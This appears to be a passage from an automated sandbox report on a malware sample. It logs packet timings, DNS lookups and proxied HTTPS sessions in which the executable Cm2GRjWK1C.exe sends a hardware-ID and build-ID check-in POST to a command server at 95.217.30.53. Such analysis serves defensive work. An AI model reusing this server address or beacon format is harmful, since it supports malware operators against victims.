Mar 15, 2025 08:29:47.011416912 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.011445045 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.011475086 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.014578104 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.014590025 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.014698029 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.014703989 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.014713049 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.014719009 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.014733076 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.014753103 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.014769077 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.014775991 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.014785051 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.014796972 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.014820099 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.014827967 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.014843941 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.014853954 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.014868021 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.014894009 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.014900923 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.014926910 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.017463923 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.017528057 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.017684937 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.017710924 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.017904997 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.017935038 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.058630943 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.058671951 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.058971882 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.058989048 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.059010983 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.059041023 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.059078932 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.059107065 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.059112072 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.059140921 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.059144020 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.059182882 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.059195042 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.059215069 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.059242010 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.059269905 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.059303045 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.059340954 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.059351921 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.059362888 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.059405088 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.064574957 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.064585924 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.064697027 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.064722061 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.064728975 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.064780951 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.064831018 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.064856052 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.064861059 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.064953089 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.067286015 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.067365885 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.067466974 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.067498922 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.067714930 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.067747116 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.067754030 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.070477962 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.070528030 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.070697069 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.070705891 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.070806026 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.070838928 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.073251009 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.073261976 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.073307037 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.073316097 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.073369026 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.073376894 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.073389053 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.073400021 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.073457003 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.073471069 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.073487043 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.073532104 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.073565960 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.073594093 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.073636055 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.073641062 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.073661089 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.073694944 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.082962990 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.117521048 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.117561102 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.117734909 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.117757082 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.117799044 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.117835045 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.117860079 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.117888927 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.117899895 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.117995024 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.118040085 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.118053913 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.118165016 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.118194103 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.118218899 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.118285894 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.157300949 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.157372952 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.157641888 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.201392889 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.278373003 CET	443	49773	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.281969070 CET	49773	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.282833099 CET	49773	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.282861948 CET	443	49773	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:47.284758091 CET	49773	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:47.284771919 CET	443	49773	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:48.212336063 CET	443	49773	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:48.212358952 CET	443	49773	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:48.212423086 CET	443	49773	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:48.212454081 CET	49773	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:48.212455034 CET	49773	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:48.212543964 CET	49773	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:48.222368002 CET	49773	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:48.222389936 CET	443	49773	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:48.235985041 CET	49774	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:48.236016035 CET	443	49774	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:48.236069918 CET	49774	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:48.236823082 CET	49774	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:48.236836910 CET	443	49774	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:48.348778009 CET	49708	80	192.168.2.4	104.18.20.226
Mar 15, 2025 08:29:48.348831892 CET	49709	80	192.168.2.4	104.18.20.226
Mar 15, 2025 08:29:48.353828907 CET	80	49708	104.18.20.226	192.168.2.4
Mar 15, 2025 08:29:48.353888988 CET	49708	80	192.168.2.4	104.18.20.226
Mar 15, 2025 08:29:48.354165077 CET	80	49709	104.18.20.226	192.168.2.4
Mar 15, 2025 08:29:48.354213953 CET	49709	80	192.168.2.4	104.18.20.226
Mar 15, 2025 08:29:48.918667078 CET	443	49774	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:48.922303915 CET	49774	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:48.922712088 CET	49774	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:48.922719002 CET	443	49774	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:48.924412012 CET	49774	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:48.924417019 CET	443	49774	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:49.682590008 CET	443	49774	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:49.682621002 CET	443	49774	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:49.682667971 CET	49774	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:49.682684898 CET	443	49774	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:49.682699919 CET	443	49774	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:49.682707071 CET	49774	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:49.682742119 CET	49774	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:49.689471006 CET	49774	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:49.689481020 CET	443	49774	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:49.713382959 CET	49775	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:49.713427067 CET	443	49775	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:49.713495970 CET	49775	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:49.713711977 CET	49775	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:49.713720083 CET	443	49775	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:50.388987064 CET	443	49775	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:50.389075994 CET	49775	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:50.389624119 CET	49775	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:50.389628887 CET	443	49775	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:50.391288996 CET	49775	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:50.391293049 CET	443	49775	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:51.119445086 CET	443	49775	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:51.119518995 CET	49775	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:51.119533062 CET	443	49775	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:51.119549036 CET	443	49775	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:51.119568110 CET	49775	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:51.119597912 CET	49775	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:51.120358944 CET	49775	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:51.120368958 CET	443	49775	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:53.792484999 CET	80	49713	217.20.57.19	192.168.2.4
Mar 15, 2025 08:29:53.792615891 CET	49713	80	192.168.2.4	217.20.57.19
Mar 15, 2025 08:29:54.334472895 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:54.334564924 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:54.334567070 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:54.334611893 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:54.335575104 CET	49772	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:54.335596085 CET	443	49772	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:54.398770094 CET	80	49714	217.20.57.19	192.168.2.4
Mar 15, 2025 08:29:54.398899078 CET	49714	80	192.168.2.4	217.20.57.19
Mar 15, 2025 08:29:54.398916960 CET	49714	80	192.168.2.4	217.20.57.19
Mar 15, 2025 08:29:54.403613091 CET	80	49714	217.20.57.19	192.168.2.4
Mar 15, 2025 08:29:54.824429989 CET	49776	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:54.824460983 CET	443	49776	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:54.824538946 CET	49776	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:54.824801922 CET	49776	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:54.824814081 CET	443	49776	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:55.507827997 CET	443	49776	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:55.507903099 CET	49776	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:55.508382082 CET	49776	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:55.508388996 CET	443	49776	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:55.510122061 CET	49776	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:55.510128975 CET	443	49776	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:55.510193110 CET	49776	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:55.510210037 CET	443	49776	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:55.510272980 CET	49776	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:55.510286093 CET	443	49776	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:55.510293007 CET	49776	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:55.510301113 CET	443	49776	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:55.510359049 CET	49776	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:55.510385990 CET	443	49776	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:55.510410070 CET	49776	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:55.510421991 CET	443	49776	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:55.510464907 CET	49776	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:55.510469913 CET	443	49776	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:55.510489941 CET	49776	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:55.510493994 CET	443	49776	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:56.550790071 CET	80	49718	217.20.57.19	192.168.2.4
Mar 15, 2025 08:29:56.550970078 CET	49718	80	192.168.2.4	217.20.57.19
Mar 15, 2025 08:29:56.553596973 CET	49718	80	192.168.2.4	217.20.57.19
Mar 15, 2025 08:29:56.558243990 CET	80	49718	217.20.57.19	192.168.2.4
Mar 15, 2025 08:29:56.712393045 CET	443	49776	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:56.712474108 CET	443	49776	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:56.712476015 CET	49776	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:56.712630987 CET	49776	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:56.714977980 CET	49776	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:56.714998007 CET	443	49776	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:56.799462080 CET	49777	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:56.799500942 CET	443	49777	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:56.799567938 CET	49777	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:56.800055027 CET	49777	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:56.800071001 CET	443	49777	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:56.912939072 CET	80	49719	217.20.57.19	192.168.2.4
Mar 15, 2025 08:29:56.913033009 CET	49719	80	192.168.2.4	217.20.57.19
Mar 15, 2025 08:29:57.360939980 CET	80	49720	217.20.57.19	192.168.2.4
Mar 15, 2025 08:29:57.361073971 CET	49720	80	192.168.2.4	217.20.57.19
Mar 15, 2025 08:29:57.361073971 CET	49720	80	192.168.2.4	217.20.57.19
Mar 15, 2025 08:29:57.365813017 CET	80	49720	217.20.57.19	192.168.2.4
Mar 15, 2025 08:29:57.442548037 CET	49716	80	192.168.2.4	142.250.185.163
Mar 15, 2025 08:29:57.447680950 CET	80	49716	142.250.185.163	192.168.2.4
Mar 15, 2025 08:29:57.447751999 CET	49716	80	192.168.2.4	142.250.185.163
Mar 15, 2025 08:29:57.490367889 CET	443	49777	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:57.490526915 CET	49777	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:57.491040945 CET	49777	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:57.491050959 CET	443	49777	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:57.492826939 CET	49777	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:57.492832899 CET	443	49777	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:58.149194956 CET	49717	443	192.168.2.4	2.23.227.208
Mar 15, 2025 08:29:58.149568081 CET	49719	80	192.168.2.4	217.20.57.19
Mar 15, 2025 08:29:58.260251999 CET	443	49777	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:58.260318995 CET	443	49777	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:58.260387897 CET	49777	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:58.260588884 CET	49777	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:58.260597944 CET	443	49777	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:58.261719942 CET	49778	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:58.261744976 CET	443	49778	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:58.262480021 CET	49778	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:58.262700081 CET	49778	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:58.262712955 CET	443	49778	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:58.945729017 CET	443	49778	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:58.948311090 CET	49778	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:58.948697090 CET	49778	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:58.948704958 CET	443	49778	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:58.950423956 CET	49778	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:58.950431108 CET	443	49778	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:59.722726107 CET	443	49778	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:59.722793102 CET	443	49778	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:59.722805977 CET	49778	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:59.722865105 CET	49778	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:59.723236084 CET	49778	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:59.723247051 CET	443	49778	95.217.30.53	192.168.2.4
Mar 15, 2025 08:30:43.161700964 CET	49712	443	192.168.2.4	20.190.160.67
Mar 15, 2025 08:30:43.167007923 CET	443	49712	20.190.160.67	192.168.2.4
Mar 15, 2025 08:30:43.167054892 CET	49712	443	192.168.2.4	20.190.160.67
Mar 15, 2025 08:30:57.459880114 CET	443	49711	131.253.33.254	192.168.2.4
Mar 15, 2025 08:30:57.460225105 CET	49711	443	192.168.2.4	131.253.33.254

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 15, 2025 08:29:31.141288042 CET	53	60911	1.1.1.1	192.168.2.4
Mar 15, 2025 08:29:31.232796907 CET	53	59532	1.1.1.1	192.168.2.4
Mar 15, 2025 08:29:31.316930056 CET	55921	53	192.168.2.4	1.1.1.1
Mar 15, 2025 08:29:31.317255974 CET	52340	53	192.168.2.4	1.1.1.1
Mar 15, 2025 08:29:31.323750019 CET	53	55921	1.1.1.1	192.168.2.4
Mar 15, 2025 08:29:31.323853016 CET	53	52340	1.1.1.1	192.168.2.4
Mar 15, 2025 08:29:33.139966011 CET	53	58346	1.1.1.1	192.168.2.4
Mar 15, 2025 08:29:33.339585066 CET	53	62477	1.1.1.1	192.168.2.4
Mar 15, 2025 08:29:33.500466108 CET	53	60441	1.1.1.1	192.168.2.4
Mar 15, 2025 08:29:35.301558018 CET	62542	53	192.168.2.4	1.1.1.1
Mar 15, 2025 08:29:35.301763058 CET	56299	53	192.168.2.4	1.1.1.1
Mar 15, 2025 08:29:35.307733059 CET	53	50770	1.1.1.1	192.168.2.4
Mar 15, 2025 08:29:35.308166027 CET	53	62542	1.1.1.1	192.168.2.4
Mar 15, 2025 08:29:35.309191942 CET	53	56299	1.1.1.1	192.168.2.4
Mar 15, 2025 08:29:36.303894043 CET	51960	53	192.168.2.4	1.1.1.1
Mar 15, 2025 08:29:36.304019928 CET	52478	53	192.168.2.4	1.1.1.1
Mar 15, 2025 08:29:36.310569048 CET	53	52478	1.1.1.1	192.168.2.4
Mar 15, 2025 08:29:36.310587883 CET	53	51960	1.1.1.1	192.168.2.4
Mar 15, 2025 08:30:18.088993073 CET	138	138	192.168.2.4	192.168.2.255

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 15, 2025 08:29:31.316930056 CET	192.168.2.4	1.1.1.1	0x41be	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Mar 15, 2025 08:29:31.317255974 CET	192.168.2.4	1.1.1.1	0x922e	Standard query (0)	www.google.com	65	IN (0x0001)	false
Mar 15, 2025 08:29:35.301558018 CET	192.168.2.4	1.1.1.1	0xf7e4	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Mar 15, 2025 08:29:35.301763058 CET	192.168.2.4	1.1.1.1	0xcbc1	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Mar 15, 2025 08:29:36.303894043 CET	192.168.2.4	1.1.1.1	0xd073	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Mar 15, 2025 08:29:36.304019928 CET	192.168.2.4	1.1.1.1	0x75e0	Standard query (0)	play.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 15, 2025 08:29:31.323750019 CET	1.1.1.1	192.168.2.4	0x41be	No error (0)	www.google.com		142.250.186.68	A (IP address)	IN (0x0001)	false
Mar 15, 2025 08:29:31.323853016 CET	1.1.1.1	192.168.2.4	0x922e	No error (0)	www.google.com			65	IN (0x0001)	false
Mar 15, 2025 08:29:35.308166027 CET	1.1.1.1	192.168.2.4	0xf7e4	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 15, 2025 08:29:35.308166027 CET	1.1.1.1	192.168.2.4	0xf7e4	No error (0)	plus.l.google.com		142.250.185.142	A (IP address)	IN (0x0001)	false
Mar 15, 2025 08:29:35.309191942 CET	1.1.1.1	192.168.2.4	0xcbc1	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 15, 2025 08:29:36.310587883 CET	1.1.1.1	192.168.2.4	0xd073	No error (0)	play.google.com		142.250.185.206	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

95.217.30.53

www.google.com

apis.google.com

play.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49725	95.217.30.53	443	7628	C:\Users\user\Desktop\Cm2GRjWK1C.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-15 07:29:17 UTC	87	OUT	GET / HTTP/1.1 Host: 95.217.30.53 Connection: Keep-Alive Cache-Control: no-cache
2025-03-15 07:29:18 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 15 Mar 2025 07:29:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-03-15 07:29:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49728	95.217.30.53	443	7628	C:\Users\user\Desktop\Cm2GRjWK1C.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-15 07:29:18 UTC	179	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----f3ohlfuk6f3e3ectri5f Host: 95.217.30.53 Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2025-03-15 07:29:18 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 66 33 6f 68 6c 66 75 6b 36 66 33 65 33 65 63 74 72 69 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 33 43 39 35 35 32 32 44 39 32 35 34 30 37 31 31 37 33 38 35 33 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 66 33 6f 68 6c 66 75 6b 36 66 33 65 33 65 63 74 72 69 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 35 34 32 35 62 66 39 31 38 31 65 36 63 31 33 32 61 61 62 39 66 65 39 64 35 64 62 62 30 61 66 0d 0a 2d 2d 2d 2d 2d 2d 66 33 6f 68 6c 66 75 6b 36 66 33 65 33 65 63 74 72 69 35 66 2d 2d 0d Data Ascii: ------f3ohlfuk6f3e3ectri5fContent-Disposition: form-data; 